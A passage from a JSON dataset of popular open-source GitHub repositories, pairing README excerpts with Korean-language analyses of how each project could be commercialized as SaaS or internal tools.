4.x documentation.\n\n## How to open an issue\n\nIf the issue is with an ASP.NET Core document:\n\n* Do **not** open a blank issue.\n* Open the issue using the **Open a documentation issue** link and feedback form at the bottom of the article. \n\nUsing the **Open a documentation issue** link and form to open an issue adds article metadata for tracking, which indicates the article that you're commenting on and automatically pings the author for a faster response.\n\nIf the issue is:\n\n* A simple typo or similar correction, you can submit a PR. See [the contributor guide](https://docs.microsoft.com/c","composite_score":0.2,"license_safety_tag":"unknown"},{"name":"knsv/mermaid","github_url":"https://github.com/knsv/mermaid","stars":44,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Mermaid 저장소 분석\n\n## 왜 보물인가\n복잡한 업무 흐름이나 시스템 구조를 간단한 텍스트로 자동으로 그림으로 변환해주는 도구로, 기술자가 아닌 누구나 전문적인 다이어그램을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 업무 관리 앱(아사나, 먼데이 닷컴 같은)에 내장하여 팀원들이 프로젝트 일정을 자동으로 시각화하","readme_excerpt":"<p align=\"center\">\n<img src=\"https://raw.githubusercontent.com/mermaid-js/mermaid/develop/docs/public/favicon.svg\" height=\"150\">\n</p>\n<h1 align=\"center\">\nMermaid\n</h1>\n<p align=\"center\">\nGenerate diagrams from markdown-like text.\n<p>\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/mermaid\"><img src=\"https://img.shields.io/npm/v/mermaid?color=ff3670&label=\"></a>\n<p>\n\n<p align=\"center\">\n<a href=\"https://mermaid.ai/live/\"><b>Live Editor!</b></a>\n</p>\n<p align=\"center\">\n <a href=\"https://mermaid.ai/open-source/\">📖 Documentation</a> | <a href=\"https://mermaid.ai/open-source/intro/\">🚀 Getting Started</a> | <a href=\"https://www.jsdelivr.com/package/npm/mermaid\">🌐 CDN</a> | <a href=\"https://discord.gg/sKeNQX4Wtj\" title=\"Discord invite\">🙌 Join Us</a>\n</p>\n<p align=\"center\">\n<a href=\"./README.zh-CN.md\">简体中文</a>\n</p>\n<p align=\"center\">\nTry Live Editor previews of future releases: <a href=\"https://develop.git.mermaid.live/\" title=\"Try the mermaid version from the develop branch.\">Devel","composite_score":0.2,"license_safety_tag":"safe"},{"name":"react-community/react-navigation","github_url":"https://github.com/react-community/react-navigation","stars":22,"language":"TypeScript","license":"bsd-2-clause","abandonment_months":0,"description":"# React Navigation 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면 전환을 쉽게 만들어주는 핵심 도구로, 수백만 개의 앱이 의존하는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 플랫폼 (SaaS)**\n- 개발자가 앱을 쉽게 만들 수 있도록 도와주는 웹 기반 서비스로 제공 가능\n\n**2. 앱 개발 교육 플랫폼 (","readme_excerpt":"# React Navigation 8\n\n[![Build Status][build-badge]][build]\n[![Code Coverage][coverage-badge]][coverage]\n[![MIT License][license-badge]][license]\n\nRouting and navigation for your React Native apps.\n\nDocumentation can be found at [reactnavigation.org](https://reactnavigation.org/).\n\nThis branch contains the code for the upcoming major version of React Navigation. You can find the code for other versions in the following branches:\n\n- [7.x](https://github.com/react-navigation/react-navigation/tree/7.x) (latest stable)\n- [6.x](https://github.com/react-navigation/react-navigation/tree/6.x)\n- [5.x](https://github.com/react-navigation/react-navigation/tree/5.x)\n- [4.x](https://github.com/react-navigation/react-navigation/tree/4.x)\n- [3.x](https://github.com/react-navigation/react-navigation/tree/3.x)\n- [2.x](https://github.com/react-navigation/react-navigation/tree/2.x)\n- [1.x](https://github.com/react-navigation/react-navigation/tree/1.x)\n\n## Package Versions\n\n| Name                         ","composite_score":0.2,"license_safety_tag":"safe"},{"name":"kubernetes-incubator/kubespray","github_url":"https://github.com/kubernetes-incubator/kubespray","stars":12,"language":"Jinja","license":"apache-2.0","abandonment_months":0,"description":"# Kubespray 프로젝트 분석\n\n## 왜 보물인가\n기업들이 자신의 서버에 쿠버네티스(대규모 애플리케이션 관리 시스템)를 자동으로 설치·관리할 수 있게 해주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 내부 클라우드 구축 서비스**: IT 담당자들이 복잡한 설치 과정 없이 자동화된 도구로 자체 서버에 시스템을 구축하는 상품화\n2. ","readme_excerpt":"# Deploy a Production Ready Kubernetes Cluster\n\n![Kubernetes Logo](https://raw.githubusercontent.com/kubernetes-sigs/kubespray/master/docs/img/kubernetes-logo.png)\n\nIf you have questions, check the documentation at [kubespray.io](https://kubespray.io) and join us on the [kubernetes slack](https://kubernetes.slack.com), channel **\\#kubespray**.\nYou can get your invite [here](http://slack.k8s.io/)\n\n- Can be deployed on **[AWS](docs/cloud_providers/aws.md), GCE, [Azure](docs/cloud_providers/azure.md), [OpenStack](docs/cloud_controllers/openstack.md), [vSphere](docs/cloud_controllers/vsphere.md), [Equinix Metal](docs/cloud_providers/equinix-metal.md) (bare metal), Oracle Cloud Infrastructure (Experimental), or Baremetal**\n- **Highly available** cluster\n- **Composable** (Choice of the network plugin for instance)\n- Supports most popular **Linux distributions**\n- **Continuous integration tests**\n\n## Quick Start\n\nBelow are several ways to use Kubespray to deploy a Kubernetes cluster.\n\n### Doc","composite_score":0.2,"license_safety_tag":"safe"},{"name":"Roshanjossey/first-contributions","github_url":"https://github.com/Roshanjossey/first-contributions","stars":5,"language":"","license":"mit","abandonment_months":0,"description":"# Roshanjossey/first-contributions 분석\n\n## 왜 보물인가\n프로그래밍을 처음 배우는 사람들이 실제로 코드를 기여하는 경험을 안전하게 할 수 있는 교육 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 SaaS**: 초급 개발자 교육 플랫폼에 내장하여 학생들의 실전 경험 제공\n2. **기업 온보딩 도구**: 신입","readme_excerpt":"[![Open Source Love](https://firstcontributions.github.io/open-source-badges/badges/open-source-v1/open-source.svg)](https://github.com/firstcontributions/open-source-badges)\n[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT)\n[![Open Source Helpers](https://www.codetriage.com/roshanjossey/first-contributions/badges/users.svg)](https://www.codetriage.com/roshanjossey/first-contributions)\n\n#### _Read this in [other languages](docs/translations/Translations.md)._\n<kbd>[<img title=\"Shqip\" alt=\"Shqip\" src=\"https://cdn.jsdelivr.net/gh/hampusborgos/country-flags@main/svg/al.svg\" width=\"22\">](docs/translations/README.al.md)</kbd>\n<kbd>[<img title=\"Armenian\" alt=\"Armenian\" src=\"https://cdn.jsdelivr.net/gh/hampusborgos/country-flags@main/svg/am.svg\" width=\"22\">](docs/translations/README.arm.md)</kbd>\n<kbd>[<img title=\"Uzbek\" alt=\"Uzbek language\" src=\"https://cdn.jsdelivr.net/gh/hampusborgos/country-flags@main/svg/uz.svg\" width=\"22\">](docs/t","composite_score":0.2,"license_safety_tag":"safe"},{"name":"gogits/gogs","github_url":"https://github.com/gogits/gogs","stars":31,"language":"Go","license":"mit","abandonment_months":0,"description":"# Gogs 저장소 분석\n\n## 왜 보물인가\n자신의 서버에 설치해서 운영할 수 있는 깃허브 같은 코드 협업 플랫폼으로, 큰 회사의 프라이빗 저장소 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발팀이 많은 회사를 대상으로 '자체 호스팅 깃허브' 플랫폼을 월 구독료로 판매\n- **내부 업무 도구**: 대기업의 보안 요구","readme_excerpt":"![gogs-brand](https://user-images.githubusercontent.com/2946214/146899259-6a8b58ad-8d6e-40d2-ab02-79dc6aadabbf.png)\n\n[![GitHub Workflow Status](https://img.shields.io/github/checks-status/gogs/gogs/main?logo=github&style=for-the-badge)](https://github.com/gogs/gogs/actions?query=branch%3Amain) [![Sourcegraph](https://img.shields.io/badge/view%20on-Sourcegraph-brightgreen.svg?style=for-the-badge&logo=sourcegraph)](https://sourcegraph.com/github.com/gogs/gogs)\n\n👉 Deploy on DigitalOcean and [get $200 in free credits](https://m.do.co/c/5aeb02268b55)!\n\n## 🔮 Vision\n\nThe Gogs (`/gɑgz/`) project aims to build a simple, stable and extensible self-hosted Git service that can be set up in the most painless way. With Go, this can be done with an independent binary distribution across all platforms that Go supports, including Linux, macOS, Windows and ARM-based systems.\n\n## 📡 Overview\n\n- Please visit [our home page](https://gogs.io) for user documentation.\n- Please refer to [CHANGELOG.md](CHANGELOG","composite_score":0.2,"license_safety_tag":"safe"},{"name":"nuxt/nuxt.js","github_url":"https://github.com/nuxt/nuxt.js","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Nuxt.js 저장소 분석\n\n## 왜 보물인가\n웹사이트를 빠르고 쉽게 만들어주는 도구로, 전 세계 개발자들이 널리 사용하고 있어 수요가 지속적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 프로젝트 관리 도구, CRM 솔루션 등의 웹 기반 소프트웨어를 빠르게 개발할 수 있습니다.\n\n**2. 내부 업무 도구**\n- 회사 직원들이 사용","readme_excerpt":"<a href=\"https://nuxt.com\"><img width=\"830\" height=\"213\" src=\"./.github/assets/banner.svg\" alt=\"Nuxt banner\"></a>\n\n# Nuxt\n\n<p>\n  <a href=\"https://npmx.dev/package/nuxt\"><img src=\"https://npmx.dev/api/registry/badge/version/nuxt\" alt=\"Version\"></a>\n  <a href=\"https://npmx.dev/package/nuxt\"><img src=\"https://npmx.dev/api/registry/badge/downloads/nuxt\" alt=\"Downloads\"></a>\n  <a href=\"https://github.com/nuxt/nuxt/blob/main/LICENSE\"><img src=\"https://img.shields.io/github/license/nuxt/nuxt.svg?style=flat&colorA=18181B&colorB=28CF8D\" alt=\"License\"></a>\n  <a href=\"https://nuxt.com/modules\"><img src=\"https://img.shields.io/badge/dynamic/json?url=https://nuxt.com/api/v1/modules&query=$.stats.modules&label=Modules&style=flat&colorA=18181B&colorB=28CF8D\" alt=\"Modules\"></a>\n  <a href=\"https://nuxt.com\"><img src=\"https://img.shields.io/badge/Nuxt%20Docs-18181B?logo=nuxt\" alt=\"Website\"></a>\n  <a href=\"https://chat.nuxt.dev\"><img src=\"https://img.shields.io/badge/Nuxt%20Discord-18181B?logo=discord\" a","composite_score":0.2,"license_safety_tag":"safe"},{"name":"OpenSkywalking/skywalking","github_url":"https://github.com/OpenSkywalking/skywalking","stars":10,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# OpenSkywalking/skywalking 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 시스템이 제대로 작동하는지 실시간으로 감시하고 문제를 빠르게 찾아내는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자상거래 플랫폼이 고객 주문 처리 중 어느 부분이 느린지 자동으로 감지하는 모니터링 서비스\n2. **내부 업무 도구**: 은","readme_excerpt":"Apache SkyWalking\n==========\n\n<img src=\"http://skywalking.apache.org/assets/logo.svg\" alt=\"Sky Walking logo\" height=\"90px\" align=\"right\" />\n\n**SkyWalking**: an APM (Application Performance Monitoring) system, especially designed for\nmicroservices, cloud native and container-based architectures.\n\n[![GitHub stars](https://img.shields.io/github/stars/apache/skywalking.svg?style=for-the-badge&label=Stars&logo=github)](https://github.com/apache/skywalking)\n[![X Follow](https://img.shields.io/badge/2K%2B-follow?style=for-the-badge&logo=X&label=%40ASFSKYWALKING)](https://x.com/AsfSkyWalking)\n\n![GitHub Release](https://img.shields.io/github/v/release/apache/skywalking)\n\n# Abstract\n**SkyWalking** is an open-source APM system that provides monitoring, tracing and diagnosing capabilities for distributed systems in Cloud Native architectures.\n\n\n* Distributed Tracing\n  * End-to-end distributed tracing. Service topology analysis, service-centric observability and APIs dashboards.\n* Agents for your s","composite_score":0.2,"license_safety_tag":"safe"},{"name":"alibaba/dubbo","github_url":"https://github.com/alibaba/dubbo","stars":35,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# Dubbo 저장소 분석\n\n## 왜 보물인가\n여러 컴퓨터가 서로 통신하고 협력하는 대규모 시스템을 효율적으로 만들 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 플랫폼**: 상품 검색, 결제, 배송 등 각 기능이 독립적으로 작동하면서 빠르게 통신하는 온라인 쇼핑몰\n- **금융 서비스 API**: 은행, 증권사 등이 고객사에 계좌 ","readme_excerpt":"\n# Apache Dubbo Project\n\n[![Build and Test For PR](https://github.com/apache/dubbo/actions/workflows/build-and-test-pr.yml/badge.svg)](https://github.com/apache/dubbo/actions/workflows/build-and-test-pr.yml)\n[![Codecov](https://codecov.io/gh/apache/dubbo/branch/3.3/graph/badge.svg)](https://codecov.io/gh/apache/dubbo)\n[![Maven](https://img.shields.io/github/v/release/apache/dubbo.svg?sort=semver)](https://github.com/apache/dubbo/releases)\n[![License](https://img.shields.io/github/license/apache/dubbo.svg)](https://github.com/apache/dubbo/blob/3.3/LICENSE)\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/apache/dubbo.svg)](http://isitmaintained.com/project/apache/dubbo)\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/apache/dubbo.svg)](http://isitmaintained.com/project/apache/dubbo)\n\nApache Dubbo is a powerful and user-friendly Web and RPC framework. It supports multiple language implementations such as Java, [Go](https://github.co","composite_score":0.2,"license_safety_tag":"safe"},{"name":"ncw/rclone","github_url":"https://github.com/ncw/rclone","stars":7,"language":"Go","license":"mit","abandonment_months":0,"description":"# rclone 상용화 분석\n\n## 왜 보물인가\n구글 드라이브, 드롭박스, AWS 등 여러 클라우드 저장소를 하나의 도구로 통합 관리할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 파일 백업 플랫폼 - 직원들이 사용하는 모든 클라우드 계정의 데이터를 자동으로 한곳에 모아 관리\n2. **내부 업무 도구**: 대규모 ","readme_excerpt":"<!-- markdownlint-disable-next-line first-line-heading no-inline-html -->\n[<img src=\"https://rclone.org/img/logo_on_light__horizontal_color.svg\" width=\"50%\" alt=\"rclone logo\">](https://rclone.org/#gh-light-mode-only)\n<!-- markdownlint-disable-next-line no-inline-html -->\n[<img src=\"https://rclone.org/img/logo_on_dark__horizontal_color.svg\" width=\"50%\" alt=\"rclone logo\">](https://rclone.org/#gh-dark-mode-only)\n\n[Website](https://rclone.org) |\n[Documentation](https://rclone.org/docs/) |\n[Download](https://rclone.org/downloads/) |\n[Contributing](CONTRIBUTING.md) |\n[Changelog](https://rclone.org/changelog/) |\n[Installation](https://rclone.org/install/) |\n[Forum](https://forum.rclone.org/)\n\n[![Build Status](https://github.com/rclone/rclone/workflows/build/badge.svg)](https://github.com/rclone/rclone/actions?query=workflow%3Abuild)\n[![Go Report Card](https://goreportcard.com/badge/github.com/rclone/rclone)](https://goreportcard.com/report/github.com/rclone/rclone)\n[![GoDoc](https://godoc.org","composite_score":0.2,"license_safety_tag":"safe"},{"name":"Microsoft/vscode","github_url":"https://github.com/Microsoft/vscode","stars":39,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Microsoft/vscode 분석 보고서\n\n## 왜 보물인가\n전 세계 수백만 개발자가 매일 사용하는 가장 인기 있는 코드 편집 도구이며, 개인부터 대기업까지 모두가 필요로 하는 핵심 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 개발 환경을 제공하는 구독형 서비스 (예: 브라우저에서 바로 코드 작성)\n2. *","readme_excerpt":"# Visual Studio Code - Open Source (\"Code - OSS\")\n[![Feature Requests](https://img.shields.io/github/issues/microsoft/vscode/feature-request.svg)](https://github.com/microsoft/vscode/issues?q=is%3Aopen+is%3Aissue+label%3Afeature-request+sort%3Areactions-%2B1-desc)\n[![Bugs](https://img.shields.io/github/issues/microsoft/vscode/bug.svg)](https://github.com/microsoft/vscode/issues?utf8=✓&q=is%3Aissue+is%3Aopen+label%3Abug)\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-yellow.svg)](https://gitter.im/Microsoft/vscode)\n\n## The Repository\n\nThis repository (\"`Code - OSS`\") is where we (Microsoft) develop the [Visual Studio Code](https://code.visualstudio.com) product together with the community. Not only do we work on code and issues here, but we also publish our [roadmap](https://github.com/microsoft/vscode/wiki/Roadmap), [monthly iteration plans](https://github.com/microsoft/vscode/wiki/Iteration-Plans), and our [endgame plans](https://github.com/microsoft/vscode/wiki/Running-the-","composite_score":0.2,"license_safety_tag":"safe"},{"name":"mui-org/material-ui","github_url":"https://github.com/mui-org/material-ui","stars":36,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# Material-UI 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱을 만들 때 필요한 \"예쁜 버튼, 메뉴, 입력창\" 등을 빠르게 만들어주는 도구 모음이라 개발 속도를 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리, 회계 소프트웨어, 팀 협업 도구 등의 관리자 대시보드를 빠르게 구축\n2. **내부 업무 ","readme_excerpt":"<!-- #host-reference -->\n<!-- markdownlint-disable-next-line -->\n<p align=\"center\">\n  <a href=\"https://mui.com/core/\" rel=\"noopener\" target=\"_blank\"><img width=\"150\" height=\"133\" src=\"https://mui.com/static/logo.svg\" alt=\"Material UI logo\"></a>\n</p>\n\n<h1 align=\"center\">Material UI</h1>\n\n<div align=\"center\">\n\n[![license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/mui/material-ui/blob/HEAD/LICENSE)\n[![npm latest package](https://img.shields.io/npm/v/@mui/material/latest.svg)](https://www.npmjs.com/package/@mui/material)\n[![npm next package](https://img.shields.io/npm/v/@mui/material/next.svg)](https://www.npmjs.com/package/@mui/material)\n[![npm downloads](https://img.shields.io/npm/dm/@mui/material.svg)](https://www.npmjs.com/package/@mui/material)\n[![GitHub branch status](https://img.shields.io/github/checks-status/mui/material-ui/HEAD)](https://github.com/mui/material-ui/commits/HEAD/)\n[![Coverage Status](https://img.shields.io/codecov/c/github/mui/material-","composite_score":0.2,"license_safety_tag":"safe"},{"name":"robbyrussell/oh-my-zsh","github_url":"https://github.com/robbyrussell/oh-my-zsh","stars":40,"language":"Shell","license":"mit","abandonment_months":0,"description":"# Oh My Zsh 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 작업 환경을 편하게 만들어주는 도구로, 40개의 별을 받을 정도로 신뢰받는 인기 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 온보딩 SaaS**: 신입 개발자가 회사에 입사할 때 자동으로 설정해주는 환경 구성 서비스\n2. **코딩 교육 플랫폼**: 초보자용 프로","readme_excerpt":"<p align=\"center\"><img src=\"https://ohmyzsh.s3.amazonaws.com/omz-ansi-github.png\" alt=\"Oh My Zsh\"></p>\n\nOh My Zsh is an open source, community-driven framework for managing your [zsh](https://www.zsh.org/)\nconfiguration.\n\nSounds boring. Let's try again.\n\n**Oh My Zsh will not make you a 10x developer...but you may feel like one.**\n\nOnce installed, your terminal shell will become the talk of the town _or your money back!_ With each keystroke\nin your command prompt, you'll take advantage of the hundreds of powerful plugins and beautiful themes.\nStrangers will come up to you in cafés and ask you, _\"that is amazing! are you some sort of genius?\"_\n\nFinally, you'll begin to get the sort of attention that you have always felt you deserved. ...or maybe you'll\nuse the time that you're saving to start flossing more often. 😬\n\nTo learn more, visit [ohmyz.sh](https://ohmyz.sh), follow [@ohmyzsh](https://x.com/ohmyzsh) on X (formerly\nTwitter), and join us on [Discord](https://discord.gg/ohmyzsh).\n\n[!","composite_score":0.2,"license_safety_tag":"safe"},{"name":"caskroom/homebrew-cask","github_url":"https://github.com/caskroom/homebrew-cask","stars":11,"language":"Ruby","license":"bsd-2-clause","abandonment_months":0,"description":"# Homebrew Cask 저장소 분석\n\n## 왜 보물인가\nMac 컴퓨터 사용자들이 필요한 프로그램을 한 번에 자동으로 설치하고 관리할 수 있는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Mac 개발자 대상 \"프로그램 자동 설치 관리 클라우드 서비스\"로 월 구독료 수취\n2. **내부 업무 도구**: 기업의 신입 직원 컴퓨","readme_excerpt":"# Homebrew Cask\n\n_“To install, drag this icon…” no more!_\n\nHomebrew Cask extends [Homebrew](https://brew.sh) and brings its elegance, simplicity, and speed to the installation and management of prebuilt software artifacts distributed by upstream vendors, including GUI applications, CLI tools, fonts, plugins, and other packaged software.\n\nWe do this by providing a friendly CLI workflow for the administration of these artifacts on macOS and Linux.\n\n[![Join us on GitHub discussions](https://img.shields.io/badge/github-discussions-informational)](https://github.com/orgs/Homebrew/discussions/categories/casks)\n\n## Let’s try it!\n\nTo start using Homebrew Cask, you just need [Homebrew](https://brew.sh) installed.\n\n<div align=\"center\">\n  <img src=\"./doc/readme/readme-gif.gif\" width=\"450\" alt=\"Installing and uninstalling Alfred (animated gif)\">\n</div>\n\nSlower, now:\n\n```console\n% brew install alfred\n==> Fetching downloads for: alfred\n✔︎ Cask alfred (5.7.2,2312)                                     ","composite_score":0.2,"license_safety_tag":"safe"},{"name":"mattermost/mattermost-server","github_url":"https://github.com/mattermost/mattermost-server","stars":5,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# Mattermost Server 분석\n\n## 왜 보물인가\n팀이 안전하게 메시지를 주고받고 협력할 수 있는 오픈소스 협업 플랫폼으로, 기업들이 자신의 서버에 직접 설치해 운영할 수 있다는 점이 강점입니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 내부 커뮤니케이션 SaaS**: 조직 규모에 따라 구독 방식으로 운영하는 협업 플랫폼 제공\n2. **자체 서","readme_excerpt":"# [![Mattermost logo](https://user-images.githubusercontent.com/7205829/137170381-fe86eef0-bccc-4fdd-8e92-b258884ebdd7.png)](https://mattermost.com)\n\n[Mattermost](https://mattermost.com) is an open core, self-hosted collaboration platform that offers chat, workflow automation, voice calling, screen sharing, and AI integration. This repo is the primary source for core development on the Mattermost platform; it's written in Go and React, runs as a single Linux binary, and relies on PostgreSQL. A new compiled version is released under an MIT license every month on the 16th.\n\n[Deploy Mattermost on-premises](https://mattermost.com/deploy/?utm_source=github-mattermost-server-readme), or [try it for free in the cloud](https://mattermost.com/sign-up/?utm_source=github-mattermost-server-readme).\n\n<img width=\"1006\" alt=\"mattermost user interface\" src=\"https://user-images.githubusercontent.com/7205829/136107976-7a894c9e-290a-490d-8501-e5fdbfc3785a.png\">\n\nLearn more about the following use cases w","composite_score":0.2,"license_safety_tag":"unknown"},{"name":"google/protobuf","github_url":"https://github.com/google/protobuf","stars":36,"language":"C++","license":"bsd-3-clause","abandonment_months":0,"description":"# Google Protocol Buffers 분석\n\n## 왜 보물인가\n컴퓨터 간에 정보를 빠르고 안전하게 주고받기 위한 Google의 검증된 표준 방식으로, 전 세계 수백만 개 애플리케이션에서 사용 중입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 마이크로서비스 API 판매 서비스**\n- 서로 다른 회사의 시스템들이 안전하게 데이터를 주고받아야 하는 Saa","readme_excerpt":"Protocol Buffers - Google's data interchange format\n===================================================\n\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/protocolbuffers/protobuf/badge)](https://securityscorecards.dev/viewer/?uri=github.com/protocolbuffers/protobuf)\n\nCopyright 2008 Google LLC\n\nOverview\n--------\n\nProtocol Buffers (a.k.a., protobuf) are Google's language-neutral,\nplatform-neutral, extensible mechanism for serializing structured data. You\ncan learn more about it in [protobuf's documentation](https://protobuf.dev).\n\nThis README file contains protobuf installation instructions. To install\nprotobuf, you need to install the protocol compiler (used to compile .proto\nfiles) and the protobuf runtime for your chosen programming language.\n\nWorking With Protobuf Source Code\n---------------------------------\n\nMost users will find working from\n[supported releases](https://github.com/protocolbuffers/protobuf/releases) to be\nthe easiest path.\n\nIf you choose ","composite_score":0.2,"license_safety_tag":"safe"},{"name":"puikinsh/gentelella","github_url":"https://github.com/puikinsh/gentelella","stars":10,"language":"HTML","license":"mit","abandonment_months":0,"description":"# puikinsh/gentelella 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱의 관리자 화면을 빠르게 만들 수 있는 디자인 템플릿으로, 처음부터 디자인할 필요 없이 바로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 데이터 관리 클라우드 서비스의 관리자 페이지 빠른 구축\n2. **내부 업무 도구**: 중소 회사의","readme_excerpt":"# Gentelella Admin Template\n\n**Modern Bootstrap 5 Admin Dashboard Template with Vite Build System**\n\nGentelella is a powerful, free-to-use Bootstrap 5 admin template that has been completely modernized with Vite, performance optimizations, and the latest web technologies. This template provides a comprehensive foundation for building admin panels, dashboards, and back-end applications.\n\n[![Gentelella Bootstrap Admin Template](https://colorlib.com/wp/wp-content/uploads/sites/2/gentelella-admin-template-preview.jpg \"Gentelella Theme Browser Preview\")](https://colorlib.com/polygon/gentelella/index.html)\n\n**[View Live Demo](https://colorlib.com/polygon/gentelella/index.html)**\n\n## What's New in v2.2.0 (Latest Release - April 23, 2026)\n\n- **Fresh dependencies for 2026** — Vite 8 (with Rolldown, 35% faster builds), ESLint 10, Uppy 5, jsdom 29, rollup-plugin-visualizer 7, plus patch/minor bumps across the stack\n- **Tree-shaken ECharts** — `vendor-echarts` chunk reduced from 1,108 kB → 752 kB ","composite_score":0.2,"license_safety_tag":"safe"},{"name":"anncwb/vue-vben-admin","github_url":"https://github.com/anncwb/vue-vben-admin","stars":26,"language":"Vue","license":"MIT","abandonment_months":0,"description":"# vue-vben-admin 상용화 분석\n\n## 왜 보물인가\n복잡한 회사 업무용 웹사이트를 빠르게 만들 수 있는 기성품 틀(템플릿)이라 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회사의 직원 관리, 매출 현황 분석 등을 보여주는 대시보드 서비스로 판매\n2. **내부 업무 도구**: 대기업의 인사,","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://github.com/anncwb/vue-vben-admin\">\n    <img alt=\"VbenAdmin Logo\" width=\"215\" src=\"https://unpkg.com/@vbenjs/static-source@0.1.7/source/logo-v1.webp\">\n  </a>\n  <br>\n  <br>\n\n[![license](https://img.shields.io/github/license/anncwb/vue-vben-admin.svg)](LICENSE)\n\n  <h1>Vue Vben Admin</h1>\n</div>\n\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=vbenjs_vue-vben-admin&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=vbenjs_vue-vben-admin) [![codeql](https://github.com/vbenjs/vue-vben-admin/actions/workflows/codeql.yml/badge.svg)](https://github.com/vbenjs/vue-vben-admin/actions/workflows/codeql.yml) [![build](https://github.com/vbenjs/vue-vben-admin/actions/workflows/build.yml/badge.svg)](https://github.com/vbenjs/vue-vben-admin/actions/workflows/build.yml) [![ci](https://github.com/vbenjs/vue-vben-admin/actions/workflows/ci.yml/badge.svg)](https://github.com/vbenjs/vue-vben-admin/actions/workflows/ci.yml)","composite_score":0.2,"license_safety_tag":"safe"},{"name":"vuejs/vue-next","github_url":"https://github.com/vuejs/vue-next","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Vue.js Next 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱을 만드는 데 필요한 핵심 도구로, 전 세계 수백만 개발자가 사용하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 프로젝트 관리 도구나 협업 플랫폼의 사용자 인터페이스 구축\n2. **내부 업무 도구**: 기업의 직원용 대시보드나 데이터 분석 ","readme_excerpt":"# vuejs/core [![npm](https://img.shields.io/npm/v/vue.svg)](https://www.npmjs.com/package/vue) [![build status](https://github.com/vuejs/core/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/vuejs/core/actions/workflows/ci.yml) [![Download](https://img.shields.io/npm/dm/vue)](https://www.npmjs.com/package/vue)\n\n## Getting Started\n\nPlease follow the documentation at [vuejs.org](https://vuejs.org/)!\n\n## Sponsors\n\nVue.js is an MIT-licensed open source project with its ongoing development made possible entirely by the support of these awesome [backers](https://github.com/vuejs/core/blob/main/BACKERS.md). If you'd like to join them, please consider [sponsoring Vue's development](https://vuejs.org/sponsor/).\n\n<p align=\"center\">\n  <h3 align=\"center\">Special Sponsor</h3>\n</p>\n\n<p align=\"center\">\n  <a target=\"_blank\" href=\"https://betterstack.com/\">\n  <img alt=\"special sponsor\" src=\"https://automation.vuejs.org/images/better_stack.png\" width=\"300\">\n  </a>\n</p>\n\n<p align=\"cent","composite_score":0.2,"license_safety_tag":"safe"},{"name":"yacy/cider","github_url":"https://github.com/yacy/cider","stars":12,"language":"Python","license":"lgpl-3.0","abandonment_months":16,"description":"# YaCy CIDER 보물 분석\n\n## 왜 보물인가\n분산형 검색 엔진을 만드는 오픈소스 프로젝트로, 구글 같은 대형 기업에 의존하지 않고 자체 검색 시스템을 구축하려는 조직들에게 핵심 기술이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 내부 검색 SaaS**: 법무사무소, 의료기관 등 민감한 정보를 외부 검색엔진에 노출하고 싶지 않은 기업","readme_excerpt":"# YaCy Expert\n\nInspired by the vision of the talks, \"[Search Engines History and Future](https://yacy.net/material/20160430_Search_Engines_Of_The_Future_OpenTechSummit_2016.pdf)\" (FOSSASIA Singapore 2016 [video](https://www.youtube.com/watch?v=6_rMjXjD_4Y)) and \"[Search Engines of the Future](https://yacy.net/material/20160904_The_Future_of_Search_QtCon_2016.key)\" (QtCon Berlin 2016) this project aims to bring that vision of a \"future search engine\" to life. The prediction of both talks had been:\n\n*\"Future search engines will answer to all questions!\"*\n\n[Large Language Models](https://cdn.openai.com/better-language-models/language_models_are_unsupervised_multitask_learners.pdf) (LLMs) today provide a new approach to answer to all questions. The concept of a combination of LLMs with Search Engines is described as 